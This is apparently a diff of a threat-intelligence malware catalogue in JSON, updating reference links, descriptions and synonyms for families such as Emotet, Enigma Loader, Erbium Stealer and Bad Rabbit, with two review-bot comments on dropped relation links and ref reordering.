+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
+ "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html",
+ "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
+ "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/",
+ "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
+ "https://paste.cryptolaemus.com",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
+ "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
+ "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
+ "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/",
+ "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
+ "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
+ "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
+ "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
+ "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html",
+ "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html",
+ "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware",
+ "https://www.bitsight.com/blog/emotet-smb-spreader-back",
+ "https://www.zscaler.com/blogs/security-research/return-emotet-malware",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
+ "https://twitter.com/ContiLeaks/status/1498614197202079745",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-emotet",
+ "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
+ "https://d00rt.github.io/emotet_network_protocol/",
+ "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/",
+ "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "https://www.cert.pl/en/news/single/whats-up-emotet/",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
+ "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.youtube.com/watch?v=_mGMJFNJWSk",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/",
+ "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/",
+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://isc.sans.edu/diary/28044",
+ "https://community.riskiq.com/article/2cd1c003",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/",
+ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
+ "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/",
+ "https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://threatresearch.ext.hp.com/emotets-return-whats-different/",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://www.jpcert.or.jp/english/at/2019/at190044.html",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video",
+ "https://blog.lumen.com/emotet-redux/",
+ "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://muha2xmad.github.io/unpacking/emotet-part-2/",
+ "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
+ "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://isc.sans.edu/diary/rss/27036",
+ "http://ropgadget.com/posts/defensive_pcres.html",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html",
+ "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/",
+ "https://www.youtube.com/watch?v=_BLOmClsSpc",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
+ "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
+ "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/",
+ "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
+ "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5",
+ "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak",
+ "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
+ "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
+ "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
+ "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
+ "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
+ "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware"
],
"synonyms": [
"Geodo",
@@ -22122,15 +23508,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "3f7616bd-f1de-46ee-87c2-43c0c2edaa28",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
"value": "Emotet"
},
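Review bot: this hunk removes Emotet's only "related" block (the "similar" link to dest-uuid 3f7616bd-f1de-46ee-87c2-43c0c2edaa28) without a replacement, and the same removal is made for EquationDrug further down. If the generator has simply stopped emitting relations, say so in the PR description; if the link is being dropped on purpose, check the other cluster for the reverse relation so the galaxy does not end up with one-directional edges.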
@@ -22139,28 +23516,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
- "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://twitter.com/thor_scanner/status/992036762515050496",
- "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://attack.mitre.org/groups/G0096",
"http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://twitter.com/thor_scanner/status/992036762515050496",
"https://paper.seebug.org/1301/",
"https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://attack.mitre.org/groups/G0096",
- "https://www.mandiant.com/media/12596/download"
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.mandiant.com/media/12596/download",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick"
],
"synonyms": [],
"type": []
@@ -22188,12 +23566,12 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://attack.mitre.org/groups/G0011",
- "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
],
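Review bot: this Enfal hunk changes nothing: the four removed refs are the same four that are added back in a different order. The Epsilon Red, Equationgroup (Sorting), EternalRocks and Eternity Ransomware hunks below are pure reorders as well, which points to the generator emitting refs in an unstable order; sorting them would make such no-op hunks disappear.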
"synonyms": [
"Lurid"
@@ -22203,14 +23581,28 @@
"uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
"value": "Enfal"
},
+ {
+ "description": "According to Trend Micro, this is a downloader, dedicated to stage execution of a second stage malware called Enigma Stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader",
+ "https://www.trendmicro.com/en_us/research/23/b/enigma-stealer-targets-cryptocurrency-industry-with-fake-jobs.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7491f483-f3d2-4f90-be19-df1e3783f66f",
+ "value": "Enigma Loader"
+ },
{
"description": "Entropy is a ransomware first seen in 1st quarter of 2022, is being used in conjunction of Dridex infection. The ransomware uses a custom packer to pack itself which has been seen in some early dridex samples. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.entropy",
"https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
"https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
"synonyms": [],
@@ -22237,13 +23629,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.envyscout",
- "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
"https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
+ "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
- "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/"
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine"
+ ],
+ "synonyms": [
+ "ROOTSAW"
],
- "synonyms": [],
"type": []
},
"uuid": "0890e245-319d-4291-8f49-21dbc9486181",
@@ -22255,8 +23652,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red",
"https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/",
- "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/",
"https://news.sophos.com/en-us/2021/05/28/epsilonred/"
],
"synonyms": [
@@ -22273,22 +23670,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
- "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ",
"https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
- "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html"
+ "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html",
+ "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "3e0c2d35-87cb-40f9-b341-a6c8dbec697e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c4490972-3403-4043-9d61-899c0a440940",
"value": "EquationDrug"
},
@@ -22298,13 +23686,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup",
"https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html",
- "https://laanwj.github.io/2016/09/01/tadaqueos.html",
- "https://laanwj.github.io/2016/08/28/feintcloud.html",
- "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
- "https://laanwj.github.io/2016/08/22/blatsting.html",
- "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://laanwj.github.io/2016/09/11/buzzdirection.html",
+ "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
+ "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://laanwj.github.io/2016/08/28/feintcloud.html",
+ "https://laanwj.github.io/2016/09/01/tadaqueos.html",
+ "https://laanwj.github.io/2016/08/22/blatsting.html",
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
"https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html"
],
@@ -22315,10 +23703,13 @@
"value": "Equationgroup (Sorting)"
},
{
- "description": "",
+ "description": "Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer",
+ "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer",
+ "https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/",
+ "https://twitter.com/sekoia_io/status/1577222282929311744",
"https://twitter.com/abuse_ch/status/1565290110572175361"
],
"synonyms": [],
@@ -22398,8 +23789,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks",
- "https://github.com/stamparm/EternalRocks",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/"
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://github.com/stamparm/EternalRocks"
],
"synonyms": [
"MicroBotMassiveNet"
@@ -22410,74 +23801,78 @@
"value": "EternalRocks"
},
{
- "description": "",
+ "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya",
- "http://www.intezer.com/notpetya-returns-bad-rabbit/",
- "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
- "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/",
- "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/",
- "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
"https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
- "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://attack.mitre.org/groups/G0034",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
- "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
- "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
- "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
- "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine",
- "https://www.riskiq.com/blog/labs/badrabbit/",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
- "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
- "https://securelist.com/bad-rabbit-ransomware/82851/",
- "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
- "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
- "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
- "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://istari-global.com/spotlight/the-untold-story-of-notpetya/",
- "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
- "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
